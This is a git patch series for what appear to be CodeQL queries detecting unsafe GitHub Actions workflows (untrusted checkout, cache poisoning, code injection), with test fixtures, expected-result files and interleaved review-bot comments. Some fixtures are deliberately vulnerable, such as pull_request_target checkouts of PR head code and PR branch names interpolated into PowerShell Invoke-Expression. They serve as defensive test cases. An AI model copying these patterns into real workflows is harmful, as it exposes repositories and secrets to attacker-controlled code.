 not this.hasRuntimeData() and
- e.isPrivileged()
+ // and the job is not explicitly non-privileged
+ not (
+ (
+ this.hasExplicitReadPermission() or
+ this.hasImplicitReadPermission()
+ ) and
+ not this.hasExplicitSecretAccess()
+ )
 )
 )
 }

diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml
new file mode 100644
index 000000000000..a07f2922fd7a
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml
@@ -0,0 +1,46 @@
+name: Publish
+
+on:
+ push:
+ branches:
+ - main
+ pull_request_target:
+ workflow_dispatch:
+ workflow_call:
+
+jobs:
+ build-and-upload:
+ runs-on: ubuntu-latest
+ permissions:
+ contents: read
+ steps:
+
+ - name: Checkout PR
+ if: ${{ github.event_name == 'pull_request_target' }}
+ uses: actions/checkout@v3
+ with:
+ ref: ${{ github.event.pull_request.head.ref }}
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+
+ - name: Checkout
+ if: ${{ github.event_name != 'pull_request_target' }}
+ uses: actions/checkout@v3
+ with:
+ ref: main
+
+ - name: Setup Pages
+ uses: actions/configure-pages@v1
+ - name: Use Node.js
+ uses: actions/setup-node@v3
+ with:
+ node-version: 18
+ cache: npm
+ - name: Update npm to latest
+ run: npm i --prefer-online --no-fund --no-audit -g npm@latest
+ - run: npm -v
+ - run: npm i --ignore-scripts --no-audit --no-fund --package-lock
+ - run: npm run build -w www
+ - name: Upload artifact
+ uses: actions/upload-pages-artifact@v1
+ with:
+ path: './workspaces/www/build'
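Review bot: The new escape clause is an eight-line double negation, `not ((read) and not secrets)`, chained after `or`, so a reader has to recall that QL's `and` binds tighter than `or` to see that it belongs to the `e.isPrivileged()` disjunct and not to `this.isPrivileged()`. Naming it keeps the call site readable: `private predicate isExplicitlyNonPrivileged() { (this.hasExplicitReadPermission() or this.hasImplicitReadPermission()) and not this.hasExplicitSecretAccess() }` next to the other permission predicates, and here just `not this.isExplicitlyNonPrivileged()` under the existing comment. The opening `exists(EventImpl e | ...` of isPrivilegedExternallyTriggerable lies in the previous hunk, outside this one.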
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml
new file mode 100644
index 000000000000..a07f2922fd7a
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml
@@ -0,0 +1,46 @@
+name: Publish
+
+on:
+ push:
+ branches:
+ - main
+ pull_request_target:
+ workflow_dispatch:
+ workflow_call:
+
+jobs:
+ build-and-upload:
+ runs-on: ubuntu-latest
+ permissions:
+ contents: read
+ steps:
+
+ - name: Checkout PR
+ if: ${{ github.event_name == 'pull_request_target' }}
+ uses: actions/checkout@v3
+ with:
+ ref: ${{ github.event.pull_request.head.ref }}
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+
+ - name: Checkout
+ if: ${{ github.event_name != 'pull_request_target' }}
+ uses: actions/checkout@v3
+ with:
+ ref: main
+
+ - name: Setup Pages
+ uses: actions/configure-pages@v1
+ - name: Use Node.js
+ uses: actions/setup-node@v3
+ with:
+ node-version: 18
+ cache: npm
+ - name: Update npm to latest
+ run: npm i --prefer-online --no-fund --no-audit -g npm@latest
+ - run: npm -v
+ - run: npm i --ignore-scripts --no-audit --no-fund --package-lock
+ - run: npm run build -w www
+ - name: Upload artifact
+ uses: actions/upload-pages-artifact@v1
+ with:
+ path: './workspaces/www/build'
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
index 0ff47fd2c53a..92d5a0b5ce18 100644
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
@@ -4,6 +4,5 @@
 | .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
 | .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
 | .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
 | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
 | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected
index 544d26da9b74..5bf0e56e1b77 100644
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected
@@ -1,3 +1,5 @@
 | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
 | .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
 | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
+| .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
+| .github/workflows/test4.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |

From 5cd292e23e034a593f1feac0f5bba0bac2c4666c Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Wed, 26 Jun 2024 19:17:37 +0200
Subject: [PATCH 350/707] Make Untrusted Checkout and CachePoisoning rules path-problems
---
 ql/src/Security/CWE-349/CachePoisoning.ql | 7 +-
 .../CWE-829/UntrustedCheckoutCritical.ql | 10 +-
 .../CWE-094/.github/workflows/test8.yml | 48 +++
 .../CWE-094/CodeInjectionCritical.expected | 4 +
 .../CWE-094/CodeInjectionMedium.expected | 2 +
 .../Security/CWE-349/CachePoisoning.expected | 134 ++++++++-
 .../UntrustedCheckoutCritical.expected | 273 +++++++++++++++++-
 7 files changed, 451 insertions(+), 27 deletions(-)
 create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test8.yml
diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql
index feef43164614..2a9952ce07f5 100644
--- a/ql/src/Security/CWE-349/CachePoisoning.ql
+++ b/ql/src/Security/CWE-349/CachePoisoning.ql
@@ -1,7 +1,7 @@
 /**
 * @name Cache Poisoning
 * @description The cache can be poisoned by untrusted code, leading to a cache poisoning attack.
- * @kind problem
+ * @kind path-problem
 * @problem.severity error
 * @precision high
 * @security-severity 7.5
@@ -16,6 +16,8 @@ import codeql.actions.security.UntrustedCheckoutQuery
 import codeql.actions.security.CachePoisoningQuery
 import codeql.actions.security.PoisonableSteps

+query predicate edges(Step a, Step b) { a.getAFollowingStep() = b }
+
 from LocalJob j, Event e, PRHeadCheckoutStep checkout, Step s
 where
 j.getATriggerEvent() = e and
@@ -48,5 +50,4 @@ where
 // excluding privileged workflows since they can be exploited in easier circumstances
 not j.isPrivileged()
 )
-select checkout, "Potential cache poisoning in the context of the default branch on step $@.", s,
- s.toString()
+select s, checkout, s, "Potential cache poisoning in the context of the default branch"
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
index eae580ebd528..b71b3cbba99e 100644
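Review bot: `query predicate edges(Step a, Step b) { a.getAFollowingStep() = b }` is added verbatim here and again in UntrustedCheckoutCritical.ql in this same commit; one definition in a library both queries already import (PoisonableSteps or UntrustedCheckoutQuery would fit) keeps the two from drifting apart. Judging by the regenerated CachePoisoning.expected further down, getAFollowingStep() relates a step to every later step of the job, so the edge set is a transitive closure that grows quadratically with job length, while the path the query needs is always the single direct edge from `checkout` to `s`; if the AST offers an immediate-successor relation the predicate should be built on that, and if it does not, a comment such as `// getAFollowingStep() is transitive: every step reaches every later step` spares the next reader the same detour. The `select s, checkout, s, ...` line also moves the alert element from the checkout to the poisonable step, which is fine for path-problem but is a behaviour change the description does not mention.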
--- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
+++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
@@ -3,7 +3,7 @@
 * @description Priveleged workflows have read/write access to the base repository and access to secrets.
 * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment
 * that is able to push to the base repository and to access secrets.
- * @kind problem
+ * @kind path-problem
 * @problem.severity error
 * @precision very-high
 * @security-severity 9.3
@@ -17,12 +17,14 @@ import actions
 import codeql.actions.security.UntrustedCheckoutQuery
 import codeql.actions.security.PoisonableSteps

-from LocalJob j, PRHeadCheckoutStep checkout
+query predicate edges(Step a, Step b) { a.getAFollowingStep() = b }
+
+from LocalJob j, PRHeadCheckoutStep checkout, PoisonableStep s
 where
 j = checkout.getEnclosingJob() and
 j.getAStep() = checkout and
 // the checkout is followed by a known poisonable step
- checkout.getAFollowingStep() instanceof PoisonableStep and
+ checkout.getAFollowingStep() = s and
 // the checkout is not controlled by an access check
 not exists(ControlCheck check | check.dominates(checkout)) and
 // the checkout occurs in a privileged context
@@ -31,4 +33,4 @@ where
 or
 inPrivilegedExternallyTriggerableJob(checkout)
 )
-select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow."
+select s, checkout, s, "Potential unsafe checkout of untrusted code on a privileged workflow."
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test8.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test8.yml
new file mode 100644
index 000000000000..3b532e4cc672
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test8.yml
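Review bot: Binding `PoisonableStep s` with `checkout.getAFollowingStep() = s` turns one alert per unsafe checkout into one alert per poisonable step after it, so a job with several `run:` steps after a single checkout now reports the same root cause several times (the diffstat shows UntrustedCheckoutCritical.expected growing by roughly 270 lines). If one finding per checkout is the intent, restricting `s` to the first poisonable step after the checkout does it with the API already in use: `not exists(PoisonableStep earlier | checkout.getAFollowingStep() = earlier and earlier.getAFollowingStep() = s)`. The new message wording also diverges from the Medium variant, which per UntrustedCheckoutMedium.expected earlier in this series still says "untrusted pull request on privileged workflow"; either keep both aligned or update both. While in this header, `Priveleged` on the @description context line is misspelled.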
@@ -0,0 +1,48 @@
+run-name: Cleanup ${{ github.head_ref }}
+on:
+ pull_request_target:
+ types: labeled
+ paths:
+ - 'images/**'
+
+jobs:
+ clean_ci:
+ name: Clean CI runs
+ runs-on: ubuntu-latest
+ permissions:
+ actions: write
+ steps:
+ - env:
+ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+ shell: pwsh
+ run: |
+ $startDate = Get-Date -UFormat %s
+ $workflows = @("macos11", "macos12", "ubuntu2004", "ubuntu2204", "windows2019", "windows2022")
+ while ($true) {
+ $continue = $false
+ foreach ($wf in $workflows) {
+ $skippedCommand = "gh run list --workflow ${wf}.yml --branch ${{ github.event.pull_request.head.ref }} --repo ${{ github.repository }} --status skipped --json databaseId"
+ $skippedIds = Invoke-Expression -Command $skippedCommand | ConvertFrom-Json | ForEach-Object { $_.databaseId }
+ $skippedIds | ForEach-Object {
+ $deleteCommand = "gh run delete --repo ${{ github.repository }} $_"
+ Invoke-Expression -Command $deleteCommand
+ }
+ $pendingCommand = "gh run list --workflow ${wf}.yml --branch ${{ github.event.pull_request.head.ref }} --repo ${{ github.repository }} --status requested --json databaseId --template '{{ . | len }}'"
+ $pending = Invoke-Expression -Command $pendingCommand
+ if ($pending -gt 0) {
+ Write-Host "Pending for ${wf}.yml: $pending run(s)"
+ $continue = $true
+ }
+ }
+ if ($continue -eq $false) {
+ Write-Host "All done, exiting"
+ break
+ }
+ $curDate = Get-Date -UFormat %s
+ if (($curDate - $startDate) -gt 60) {
+ Write-Host "Reached timeout, exiting"
+ break
+ }
+ Write-Host "Waiting 5 seconds..."
+ Start-Sleep -Seconds 5
+ }
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
index f34915f45c21..1b98263c16e8 100644
--- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
@@ -249,6 +249,8 @@ nodes | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | semmle.label | Uses Step: refs | | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | semmle.label | steps.comment-branch.outputs.head_ref | | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | semmle.label | steps.refs.outputs.head_ref | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -348,6 +350,8 @@ subpaths | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index d919880e7264..35887c3b3707 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -249,6 +249,8 @@ nodes | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | semmle.label | Uses Step: refs | | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | semmle.label | steps.comment-branch.outputs.head_ref | | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | semmle.label | steps.refs.outputs.head_ref | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index d434bd63c518..6a91d49c0ca0 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected 
@@ -1,12 +1,122 @@ -| .github/workflows/test1.yml:13:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Uses Step | -| .github/workflows/test2.yml:11:9:14:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Uses Step | -| .github/workflows/test3.yml:11:9:14:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Uses Step | -| .github/workflows/test6.yml:10:9:13:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Uses Step | -| .github/workflows/test7.yml:10:9:13:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Uses Step | -| .github/workflows/test8.yml:12:9:15:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:15:9:17:2 | Run Step | Run Step | -| .github/workflows/test8.yml:23:9:26:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Uses Step | -| .github/workflows/test8.yml:34:9:37:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:37:9:37:75 | Run Step | Run Step | -| .github/workflows/test11.yml:14:9:19:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Uses Step | -| .github/workflows/test15.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. 
| .github/workflows/test15.yml:17:9:21:6 | Uses Step | Uses Step | -| .github/workflows/test16.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Uses Step | -| .github/workflows/test17.yml:15:9:20:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Uses Step | +edges +| .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:13:9:18:6 | Uses Step | +| .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:18:9:22:6 | Uses Step | +| .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:22:9:23:21 | Run Step | +| .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | +| .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:22:9:23:21 | Run Step | +| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:22:9:23:21 | Run Step | +| .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | +| .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:18:9:19:21 | Run Step | +| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:18:9:19:21 | Run Step | +| .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | +| .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:22:9:23:34 | Run Step | +| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:22:9:23:34 | Run Step | +| .github/workflows/test4.yml:13:9:16:6 | Uses Step | .github/workflows/test4.yml:16:9:20:6 | Uses Step | +| .github/workflows/test4.yml:13:9:16:6 | Uses Step | 
.github/workflows/test4.yml:20:9:21:34 | Run Step | +| .github/workflows/test4.yml:16:9:20:6 | Uses Step | .github/workflows/test4.yml:20:9:21:34 | Run Step | +| .github/workflows/test5.yml:11:9:14:6 | Uses Step | .github/workflows/test5.yml:14:9:18:6 | Uses Step | +| .github/workflows/test5.yml:11:9:14:6 | Uses Step | .github/workflows/test5.yml:18:9:19:11 | Run Step | +| .github/workflows/test5.yml:14:9:18:6 | Uses Step | .github/workflows/test5.yml:18:9:19:11 | Run Step | +| .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | +| .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:17:9:18:11 | Run Step | +| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:17:9:18:11 | Run Step | +| .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | +| .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:16:9:17:11 | Run Step | +| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:17:11 | Run Step | +| .github/workflows/test8.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/test8.yml:12:9:15:6 | Uses Step | +| .github/workflows/test8.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/test8.yml:15:9:17:2 | Run Step | +| .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | +| .github/workflows/test8.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/test8.yml:23:9:26:6 | Uses Step | +| .github/workflows/test8.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/test8.yml:26:9:28:2 | Uses Step | +| .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | +| .github/workflows/test8.yml:32:9:34:6 | Uses Step: comment-branch | .github/workflows/test8.yml:34:9:37:6 | Uses Step | +| .github/workflows/test8.yml:32:9:34:6 | Uses 
Step: comment-branch | .github/workflows/test8.yml:37:9:37:75 | Run Step | +| .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | +| .github/workflows/test11.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test11.yml:14:9:19:6 | Uses Step | +| .github/workflows/test11.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test11.yml:19:9:23:6 | Uses Step | +| .github/workflows/test11.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test11.yml:23:9:24:21 | Run Step | +| .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | +| .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:23:9:24:21 | Run Step | +| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:23:9:24:21 | Run Step | +| .github/workflows/test12.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test12.yml:14:9:19:6 | Uses Step | +| .github/workflows/test12.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test12.yml:19:9:20:30 | Run Step | +| .github/workflows/test12.yml:14:9:19:6 | Uses Step | .github/workflows/test12.yml:19:9:20:30 | Run Step | +| .github/workflows/test13.yml:14:9:17:6 | Uses Step | .github/workflows/test13.yml:17:9:21:6 | Uses Step | +| .github/workflows/test13.yml:14:9:17:6 | Uses Step | .github/workflows/test13.yml:21:9:22:21 | Run Step | +| .github/workflows/test13.yml:17:9:21:6 | Uses Step | .github/workflows/test13.yml:21:9:22:21 | Run Step | +| .github/workflows/test14.yml:14:9:17:6 | Uses Step | .github/workflows/test14.yml:17:9:21:6 | Uses Step | +| .github/workflows/test14.yml:14:9:17:6 | Uses Step | .github/workflows/test14.yml:21:9:22:21 | Run Step | +| .github/workflows/test14.yml:17:9:21:6 | Uses Step | .github/workflows/test14.yml:21:9:22:21 | Run Step | +| .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses 
Step | +| .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:21:9:22:21 | Run Step | +| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:21:9:22:21 | Run Step | +| .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | +| .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:21:9:22:21 | Run Step | +| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:21:9:22:21 | Run Step | +| .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:20:9:22:6 | Uses Step | +| .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | +| .github/workflows/test17.yml:20:9:22:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | +| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:19:9:24:6 | Uses Step | +| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:24:9:27:6 | Run Step | +| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:27:9:30:6 | Run Step | +| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | +| .github/workflows/test18.yml:19:9:24:6 | Uses Step | .github/workflows/test18.yml:24:9:27:6 | Run Step | +| .github/workflows/test18.yml:19:9:24:6 | Uses Step | .github/workflows/test18.yml:27:9:30:6 | Run Step | +| .github/workflows/test18.yml:19:9:24:6 | Uses Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | +| .github/workflows/test18.yml:24:9:27:6 | Run Step | .github/workflows/test18.yml:27:9:30:6 | Run Step | +| .github/workflows/test18.yml:24:9:27:6 | Run Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | +| .github/workflows/test18.yml:27:9:30:6 | Run Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | +| 
.github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:21:9:41:49 | Run Step: check |
+| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:25:7:31:4 | Uses Step |
+| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:31:7:33:4 | Uses Step |
+| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step |
+| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step |
+| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step |
+| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step |
+| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step |
+| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step |
+| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:31:7:33:4 | Uses Step |
+| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step |
+| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step |
